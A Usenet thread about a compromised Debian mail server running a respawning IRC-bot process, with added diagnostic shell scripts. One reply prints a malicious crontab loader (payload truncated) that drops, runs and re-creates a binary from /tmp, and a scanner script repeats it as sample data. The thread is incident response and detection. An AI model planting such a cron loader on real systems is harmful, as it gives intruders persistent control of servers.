How to stop the nasty process "EXE" creating endless number of connections - Security


  1. How to stop the nasty process "EXE" creating endless number of connections

    Something nasty has probably been done with one of our emailservers.

    There is a process called <> "popping up" which creates an endless
    number of connections in a few seconds causing our firewall to be "full"
    ("Conntrack table full")

    Killing the process solves the problem temporarily but it does start again
    by itself, sometimes in one minute and sometimes after two days.

    The machine is a debian server with kernel 2.6. It is running apache
    webserver with PHP, postfix mailserver together with spamassassin and
    amavis.

    Searching old posts give us some suggestions but nothing which solves the
    problem.

    Any ideas?

    We do appreciate your help with this.

    Best regards.

    // Martin Rådbo
    Teknologia
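Before the process is killed yet again it is worth recording which process actually owns the flood, because a respawned copy comes back under a new PID and the conntrack counter is the only thing that is visible from the firewall side. The following is an added example, not part of Martin's post or of any reply in the thread: a short sh script that counts connections per "PID/Program name" in `netstat -anp` output (the tool a 2.6-era Debian box has; `ss -tanp` gives the same columns on newer systems) and reports how full the conntrack table is. The netstat sample is constructed for the illustration (RFC 5737 documentation addresses, PID 4471 and the program name `exe` are invented); the /proc paths are the real ones for the old ip_conntrack and the later nf_conntrack modules.

```shell
#!/bin/sh
# Added example (not from the thread): find the process behind a
# "Conntrack table full" condition and show how full the table is.

# Constructed sample of `netstat -anp` output so the script runs offline.
# The last column is PID/Program name; UDP lines have no State column.
SAMPLE_NETSTAT='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      1203/master
tcp        0      0 192.0.2.10:43021        198.51.100.7:6667       SYN_SENT    4471/exe
tcp        0      0 192.0.2.10:43022        198.51.100.7:6667       SYN_SENT    4471/exe
tcp        0      0 192.0.2.10:43023        198.51.100.7:6667       SYN_SENT    4471/exe
tcp        0      0 192.0.2.10:25           203.0.113.5:51234       ESTABLISHED 1210/smtpd
tcp        0      0 192.0.2.10:43024        198.51.100.7:6667       SYN_SENT    4471/exe
udp        0      0 0.0.0.0:123             0.0.0.0:*                           987/ntpd'

# count_by_process: read `netstat -anp` output on stdin and print
# "<connections> <PID/Program>" sorted with the busiest process first.
# Header lines are skipped because their last field is not "digits/name".
count_by_process() {
    awk '$1 ~ /^(tcp|udp)/ && $NF ~ /^[0-9]+\// { n[$NF]++ }
         END { for (p in n) print n[p], p }' | sort -rn
}

# top_offender: just the PID/Program that owns the most connections.
top_offender() {
    count_by_process | head -n 1 | awk '{ print $2 }'
}

# conntrack_usage: "current/maximum" conntrack entries. Kernels of the
# 2.6 era expose ip_conntrack_*, later ones nf_conntrack_*; prints "n/a"
# when neither interface is readable (e.g. on a box without netfilter).
conntrack_usage() {
    for d in /proc/sys/net/netfilter/nf_conntrack \
             /proc/sys/net/ipv4/netfilter/ip_conntrack; do
        if [ -r "${d}_count" ] && [ -r "${d}_max" ]; then
            echo "$(cat "${d}_count")/$(cat "${d}_max")"
            return 0
        fi
    done
    echo "n/a"
}

# Demonstration on the constructed sample; on a live host use:
#   netstat -anp | count_by_process ; conntrack_usage
printf '%s\n' "$SAMPLE_NETSTAT" | count_by_process
echo "conntrack: $(conntrack_usage)"
```

One caveat: on a box that really is compromised, `netstat`, `ps` and friends may themselves have been replaced, so treat their output as a lead and corroborate it from outside, for example against the connection list the firewall itself keeps.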




  2. Re: How to stop the nasty process "EXE" creating endless number of connections

    Martin Rådbo wrote:

    > Something nasty has probably been done with one of our emailservers.
    >
    > There is a process called <> "popping up" which creates an endless
    > number of connections in a few seconds causing our firewall to be "full"
    > ("Conntrack table full")
    >
    > Killing the process solves the problem temporarily but it does start again
    > by itself, sometimes in one minute and sometimes after two days.
    >


    If you know that this is malware then you also know that your box has been
    compromised. You *should* know what to do with a compromised machine (hint:
    you don't wait for responses to an NNTP post).

    Since this is 'one' of your emailservers you have the tools to identify
    whether 'exe' is malware - it certainly seems to be.

    C.

  3. Re: How to stop the nasty process "EXE" creating endless number of connections

    Hi.

    If we had known exactly what to do then I wouldn't have asked you guys for
    advice...

    We are not 100 % sure this is malware but it seems to be. That's why we ask
    you. Of course we have changed the root password and similar stuff but that
    did not help either.

    I know I have seen this problem before but can not remember where I read
    about it. Please help us if you have the information.

    Thanks in advance

    yours sincerely
    // Martin Rådbo
    Teknologia


    "Colin McKinnon"
    wrote in
    message news:iVjsf.24293$Dg6.5192@newsfe3-gui.ntli.net...
    : Martin Rådbo wrote:
    :
    : > Something nasty has probably been done with one of our emailservers.
    : >
    : > There is a process called <> "popping up" which creates an endless
    : > number of connections in a few seconds causing our firewall to be "full"
    : > ("Conntrack table full")
    : >
    : > Killing the process solves the problem temporarily but it does start
    again
    : > by itself, sometimes in one minute and sometimes after two days.
    : >
    :
    : If you know that this is malware then you also know that your box has been
    : compromised. You *should* know what to do with a compromised machine
    (hint:
    : you don't wait for responses to an NNTP post).
    :
    : Since this is 'one' of your emailservers you have the tools to identify
    : whether 'exe' is malware - it certainly seems to be.
    :
    : C.


  4. Re: How to stop the nasty process "EXE" creating endless number of connections

    Martin Rådbo wrote:
    > Hi.
    >
    > If we had known exactly what to do then I wouldn't have asked you guys for
    > advice...


    The *first* thing to do if you think a machine is compromised is to take
    it off the network. It could well be spreading infection or spewing out
    spam or being used to attack someone else.

    > We are not 100 % sure this is malware but it seem to be. That's why we ask
    > you. Of course we have change the root password and similar staff but that
    > did not help either.


    Of course it won't if it has been compromised.

    > I know I have seen this problem before but can not remember where I read
    > about it. Please help us if you have the information.


    If you suspect a compromise, take the machine off the network. If you
    know it is compromised, reformat and install from clean sources.

    As Colin implied, but did not explicitly state, if you have multiple
    mail servers you can compare the behaviour of the different mail servers.

    Also, you should know what processes are meant to be running on your
    servers. If you don't, then you are in a very poor position to maintain
    them or detect any problems.

    > "Colin McKinnon"
    > wrote in
    > message news:iVjsf.24293$Dg6.5192@newsfe3-gui.ntli.net...
    > : Martin Rådbo wrote:
    > :
    > : > Something nasty has probably been done with one of our emailservers.
    > : >
    > : > There is a process called <> "popping up" which creates an endless
    > : > number of connections in a few seconds causing our firewall to be "full"
    > : > ("Conntrack table full")
    > : >
    > : > Killing the process solves the problem temporarily but it does start
    > again
    > : > by itself, sometimes in one minute and sometimes after two days.
    > : >
    > :
    > : If you know that this is malware then you also know that your box has been
    > : compromised. You *should* know what to do with a compromised machine
    > (hint:
    > : you don't wait for responses to an NNTP post).
    > :
    > : Since this is 'one' of your emailservers you have the tools to identify
    > : whether 'exe' is malware - it certainly seems to be.

    --
    Flash Gordon
    Living in interesting times.
    Although my email address says spam, it is real and I read it.

  5. Re: How to stop the nasty process "EXE" creating endless number of connections

    In addition to what everybody else has said, it might be a good idea
    (if you haven't already done so) to check your crontab file. Since it
    fires repeatedly, your problem may be there.

    If you removed the cron entry and it still fired up (assuming you are
    still on the network), then if you are running a kerberos server, that
    may also be compromised.


  6. Re: How to stop the nasty process "EXE" creating endless number of connections

    slackware guy wrote:

    > In addition to what everybody else has said, it might be a good idea
    > (if you haven't already done so) to check your crontab file. Since it
    > fires repeatedly, your problem may be there.
    >
    > If you removed the cron entry and it still fired up (assuming you are
    > still on the network), then if you are running a kerberos server, that
    > may also be compromised.


    As well as /etc/inittab

    Look for any lines that have respawn in them. Some belong -- another may
    not with the (exe) in it.

  7. Re: How to stop the nasty process "EXE" creating endless number of connections

    *** Martin Rådbo wrote:
    > Something nasty has probably been done with one of our emailservers.
    >
    > There is a process called <> "popping up" which creates an endless
    > number of connections in a few seconds causing our firewall to be "full"
    > ("Conntrack table full")
    >
    > Killing the process solves the problem temporarily but it does start again
    > by itself, sometimes in one minute and sometimes after two days.


    Look at the crontab (the crontab of the user the process <> is running under).

    Perhaps you have an entry like this:

    # "\177\105\114\10 [...] \000\37777777777" > /tmp/tblihjauk ; chmod \
    700 /tmp/tblihjauk ; /tmp/tblihjauk x ; rm -f /tmp/tblihjauk
    34 * * * * /bin/echo `crontab -l|grep '.\{666\}'|sed 's/^./echo -e -n/'`|sh

    This entry builds a UPX (UCL) compressed ELF binary, an IRC bot. The
    bot connects to an IRC server and waits for instructions.

    It often comes in through insecure PHP scripts if "allow_url_fopen = on".

    We have found a few of these in the last few days ...

    HTH

    Micha
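The persistence tricks named in the last three replies can be checked mechanically rather than by eyeballing every crontab: the comment line Micha shows carries the whole octal-escaped ELF image (which is why the bootstrap entry greps its own crontab for lines of 666 or more characters and turns the leading `#` into `echo -e -n` before piping the result into sh), and the `/etc/inittab` check from the previous reply is a matter of listing every `respawn` line whose program is not a getty. The script below is an added example and is not code from any poster. Its sample crontab is constructed, modelled on the entry above (the `/tmp/tblihjauk` name is from the post, the generated payload line is a stand-in for the real one); the sample inittab and its `/tmp/.x/exe` entry are likewise invented for the illustration. The Debian crontab locations in `scan_host` (`/etc/crontab`, `/etc/cron.d`, `/var/spool/cron/crontabs`) are the real ones.

```shell
#!/bin/sh
# Added example, not from the thread: scan crontab and inittab text for the
# persistence mechanisms discussed above. The scanners read stdin so they
# can be run over files copied from a mounted disk as well as live ones.

# Constructed sample crontab. The long comment line is generated rather
# than pasted; a real one holds the entire octal-escaped binary and is
# well over the 666 characters the bootstrap entry greps for.
LONG_PAYLOAD=$(awk 'BEGIN { s = "\\177\\105\\114\\106"
                           while (length(s) < 700) s = s "\\000\\37777777777"
                           print s }')
SAMPLE_CRONTAB=$(printf '%s\n' \
  '# m h dom mon dow command' \
  '0 3 * * * /usr/bin/find /tmp -mtime +7 -delete' \
  "# \"$LONG_PAYLOAD\" > /tmp/tblihjauk ; chmod 700 /tmp/tblihjauk ; /tmp/tblihjauk x ; rm -f /tmp/tblihjauk" \
  "34 * * * * /bin/echo \`crontab -l|grep '.\\{666\\}'|sed 's/^./echo -e -n/'\`|sh")

# Constructed sample /etc/inittab with one respawn line that does not belong.
SAMPLE_INITTAB='id:2:initdefault:
si::sysinit:/etc/init.d/rcS
1:2345:respawn:/sbin/getty 38400 tty1
2:23:respawn:/sbin/getty 38400 tty2
x9:2345:respawn:/tmp/.x/exe'

# scan_crontab: print "<reason>: <first 60 chars>" for each suspicious line.
# Rules, first match wins: an entry that feeds its own crontab back into a
# shell (the bootstrap), any line of 666+ characters (the payload comment),
# octal escape sequences, and any path under /tmp.
scan_crontab() {
    awk '
        function flag(reason) { printf "%s: %s\n", reason, substr($0, 1, 60) }
        /crontab -l/ && /[|][ \t]*(ba)?sh([ \t]|$)/ { flag("rebuilds payload from own crontab"); next }
        length($0) >= 666                           { flag("oversized line, embedded binary?"); next }
        /\\[0-7][0-7][0-7]/                         { flag("octal escape sequences"); next }
        /\/tmp\/[^ \t]+/                            { flag("uses a path under /tmp"); next }
    '
}

# scan_inittab: print "<id>: <program>" for respawn entries that are not a
# getty. Anything else respawning from init deserves a look.
scan_inittab() {
    awk -F: '$3 == "respawn" && $4 !~ /^\/sbin\/(a|min)?getty/ { print $1 ": " $4 }'
}

# scan_host: run both scanners over the live system's files, prefixing each
# finding with the file it came from. Only trustworthy when the tools
# themselves are trusted, i.e. from a rescue system with the disk mounted.
scan_host() {
    for f in /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/*; do
        [ -f "$f" ] || continue
        scan_crontab < "$f" | sed "s|^|$f: |"
    done
    [ -f /etc/inittab ] && scan_inittab < /etc/inittab | sed 's|^|/etc/inittab: |'
}

# Demonstration on the constructed samples.
printf '%s\n' "$SAMPLE_CRONTAB" | scan_crontab
printf '%s\n' "$SAMPLE_INITTAB" | scan_inittab
```

Run `scan_host` from a rescue environment with the suspect disk mounted (adjust the paths to the mount point), not from the compromised installation: once root has been lost, `crontab`, `awk` and `sh` on that box are exactly the binaries an intruder replaces, and a cron entry only has to survive until the next run to put the bot back.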
